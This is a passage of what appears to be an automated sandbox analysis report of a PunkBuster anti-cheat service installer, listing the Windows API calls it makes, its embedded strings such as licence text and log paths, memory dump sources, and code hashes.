                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $I &Agree$I &Disagree$PunkBuster End User License Agreement$SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t$button$dialog$n$text
                                              • API String ID: 3519838083-3872559604
                                              • Opcode ID: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction ID: 241a5a671ada6123a631bfefd5bb6ca2289978ba863265d408999d36451ca270
                                              • Opcode Fuzzy Hash: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction Fuzzy Hash: 8DA1AF70D00349EAEB05DFA4CC45BEEBBB4AF05308F10852EE551B62E1DBB81B48CB59
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0050F7E8,00000118,004BC183,00000001,00000000,0050ED98,00000008,004C6487,00000000,00000000,00000000), ref: 004C3F14
                                              • _strlen.LIBCMT ref: 004C3F3A
                                              • _strlen.LIBCMT ref: 004C3F4B
                                              • _strlen.LIBCMT ref: 004C3F6E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _strlen$FileModuleName
                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                              • API String ID: 1637341245-1673886896
                                              • Opcode ID: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction ID: b9b3d884a23d04d5a9ae845288b9d500708d593b82c7f80a618a4aa3ed5d7893
                                              • Opcode Fuzzy Hash: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction Fuzzy Hash: 4131C671D40218ABDB10AF658C87FDE7AB4EF04718F10445FF411AA1C2DB7C9B518BAA
                                              APIs
                                              • GetObjectA.GDI32(?,00000018,?), ref: 004387F8
                                              • 73A14C40.GDI32(00000000,00000000,?,?,?,?,?,?), ref: 00438819
                                              • 73A14C40.GDI32(00000000,?,?,?,?,?,?), ref: 0043881F
                                              • 73A16180.GDI32(?,?,00000001,00000001,00000000,?,?,?,?,?,?), ref: 00438833
                                              • SelectObject.GDI32(00000000,?), ref: 00438843
                                              • SelectObject.GDI32(00000000,00000000), ref: 0043884B
                                              • 73A14D40.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008,?,?,?,?,?,?), ref: 0043886A
                                              • SelectObject.GDI32(00000000,?), ref: 00438876
                                              • SelectObject.GDI32(00000000,?), ref: 0043887E
                                              • DeleteDC.GDI32(00000000), ref: 00438887
                                              • DeleteDC.GDI32(00000000), ref: 0043888A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$Select$Delete$A16180
                                              • String ID:
                                              • API String ID: 518046551-0
                                              • Opcode ID: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction ID: 7984cc7a5a7bcc0b52638dd99ff42acabcd130bd69c8778fa69ada57451c190c
                                              • Opcode Fuzzy Hash: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction Fuzzy Hash: 71214A71644340ABD210EB698CC0F6BBBE8EBCDB50F44092DF648972A1D675E8008B66
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004076BF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                              • _strncat.LIBCMT ref: 0040770C
                                              • _strncat.LIBCMT ref: 00407786
                                              • _strncat.LIBCMT ref: 004077FB
                                                • Part of subcall function 00406B6C: _strlen.LIBCMT ref: 00406B78
                                                • Part of subcall function 00406AE7: __EH_prolog.LIBCMT ref: 00406AEC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _strncat$H_prolog$DirectorySystem_strlen
                                              • String ID: Courier New$\LogFiles$\PunkBuster$\pbsvc.log
                                              • API String ID: 666638376-3571523793
                                              • Opcode ID: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction ID: 26f8c4236d45206483bf339da4866ef4be8d7202687d2feb97467a2a947cf969
                                              • Opcode Fuzzy Hash: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction Fuzzy Hash: FF5182B280115CAACB14EBA5DD85BDD77BC9F15304F1080BFE909A71C2DB385B89CB69
                                              APIs
                                                • Part of subcall function 0042AC50: LoadLibraryA.KERNEL32(?,?,0042B213,00000000), ref: 0042AC74
                                              • SendMessageA.USER32(?,0000045B,00000001,00000000), ref: 0042B395
                                              • SendMessageA.USER32(?,00000445,00000000,00000001), ref: 0042B3A6
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,FFFFFFFF,00000000,?,?,?,000000FF,?), ref: 0042B3BB
                                              Strings
                                              • RichEdit20A, xrefs: 0042B1EA
                                              • RICHEDIT, xrefs: 0042B21A
                                              • RICHEDIT50W, xrefs: 0042B1CC
                                              • Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll, xrefs: 0042B234
                                              • EDIT, xrefs: 0042B15D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessageSend$LibraryLoadWindow
                                              • String ID: EDIT$Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll$RICHEDIT$RICHEDIT50W$RichEdit20A
                                              • API String ID: 3695014736-220143130
                                              • Opcode ID: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction ID: fd1f3e6eab14dd8ec65f4d08ef4d7de20f72b4bfebd2e21d27a059feec06a27f
                                              • Opcode Fuzzy Hash: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction Fuzzy Hash: B08102702047508BD310DF28E845BAFB7A0FF95368F540B5EF5A5973D2C778A8058BAA
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00408012
                                              • _strncat.LIBCMT ref: 00408025
                                                • Part of subcall function 004070CD: __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                                • Part of subcall function 00407E0F: __EH_prolog.LIBCMT ref: 00407E14
                                                • Part of subcall function 0040D2B8: __EH_prolog.LIBCMT ref: 0040D2BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$_strncat$DirectorySystem
                                              • String ID: %s %s$ PunkBuster DLL Install Files Included$32-bit$64-bit$Starting PunkBuster Service Installer (v%d.%d) (%s)$\LogFiles\PunkBuster\pbsvc.log
                                              • API String ID: 1593959897-659667646
                                              • Opcode ID: d1c17a080f57daa9b324116a8c7c3789a7d1ba216c9fe5bd63ab5f575e2b63dd
                                              • Instruction ID: c8cbcd95914244e00445ad1739eb842854e526158c222c1c77cc694d2deaaf9e
                                              • Opcode Fuzzy Hash: d1c17a080f57daa9b324116a8c7c3789a7d1ba216c9fe5bd63ab5f575e2b63dd
                                              • Instruction Fuzzy Hash: FE51B3B1900208AEDB14EB65DC85BDD77B9AF04318F1041FEF209A71D2DB795A85CF58
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00494477
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: !$%02d$%03d$%04d$Courier New$L
                                              • API String ID: 885266447-3614883530
                                              • Opcode ID: 0c0297550bbf8ddfe022dab381adfa121dc131ff9338fba9037832900f50528e
                                              • Instruction ID: 60ab0369f6dd2dbcf4d7d1fdddb2370bc4fe2c9c9bfc25ac5e0f27450f90c011
                                              • Opcode Fuzzy Hash: 0c0297550bbf8ddfe022dab381adfa121dc131ff9338fba9037832900f50528e
                                              • Instruction Fuzzy Hash: AEB1D5701083809FD725DF28C840BAFBBE0AFC5714F244A6EF59987391D7799846CB9A
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00402109
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                                • Part of subcall function 004015D3: __EH_prolog.LIBCMT ref: 004015D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $Copy$PunkBuster Services Test$button$dialog$text
                                              • API String ID: 3519838083-3589454768
                                              • Opcode ID: 76b5a08b1cfa5c7d5fbc7861b65c1533f7a228ccc7332dff63859a40f55cd7ea
                                              • Instruction ID: ed48d589d5e5facd202ec40a79dd8d9ece5d7fb634fdabafeb78919855fc2bc3
                                              • Opcode Fuzzy Hash: 76b5a08b1cfa5c7d5fbc7861b65c1533f7a228ccc7332dff63859a40f55cd7ea
                                              • Instruction Fuzzy Hash: 14A19E71D00249EEEB05DFA4CC49BEEBBB8AF04308F10856EE551B62D1DBB85A44CB65
                                              APIs
                                              • CreateDialogIndirectParamA.USER32(00000000,?,?,004B4820,00000000), ref: 00424232
                                              • SetWindowLongA.USER32(?,000000EC,?), ref: 00424285
                                              • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00424576,00000000,?,?), ref: 004242B2
                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 0042433C
                                              • MoveWindow.USER32(?,?,?,00000000,?,00000000,?,?,?,?,?,?), ref: 004243CC
                                              • SetWindowTextA.USER32(?,00000000), ref: 004243E7
                                              Strings
                                              • Can't create dialog using memory template, xrefs: 00424242
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$CreateDialogIndirectLongMessageMoveParamSendText
                                              • String ID: Can't create dialog using memory template
                                              • API String ID: 3198842173-1473080150
                                              • Opcode ID: 842f8139567f96003f6765ed8ac3f988ef3293f25dd77c38576921955f773a03
                                              • Instruction ID: bca2413309c077372c06934a87c6b1bb22e49cf21180dde4032647e8baf410af
                                              • Opcode Fuzzy Hash: 842f8139567f96003f6765ed8ac3f988ef3293f25dd77c38576921955f773a03
                                              • Instruction Fuzzy Hash: D9614A753042019FC308CF65D885FABB7E9EFC8744F14462EF99A87291DB34E9058B6A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$AllocFreeH_prolog
                                              • String ID: Message$SysAllocString failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$get_Enabled failed: 0x%08lx
                                              • API String ID: 1061292655-104412183
                                              • Opcode ID: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction ID: 08d0d689e4b1c90c8307d53243ab566afb64f0a8895c35ba328b35e1111ee248
                                              • Opcode Fuzzy Hash: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction Fuzzy Hash: 4651CF7090014AAFCB00EF95CC85EAEBBB8AF08314F60466DF516B72D1D7789E44CB65
                                              APIs
                                              • CreateWindowExA.USER32(00000000,BUTTON,?,?,00000000,00000000,00000000,00000000,?,FFFFFF37,00000000,00000000), ref: 00438163
                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 0043818B
                                              • SetWindowLongA.USER32(00000000,000000FC,00437AD0), ref: 0043819E
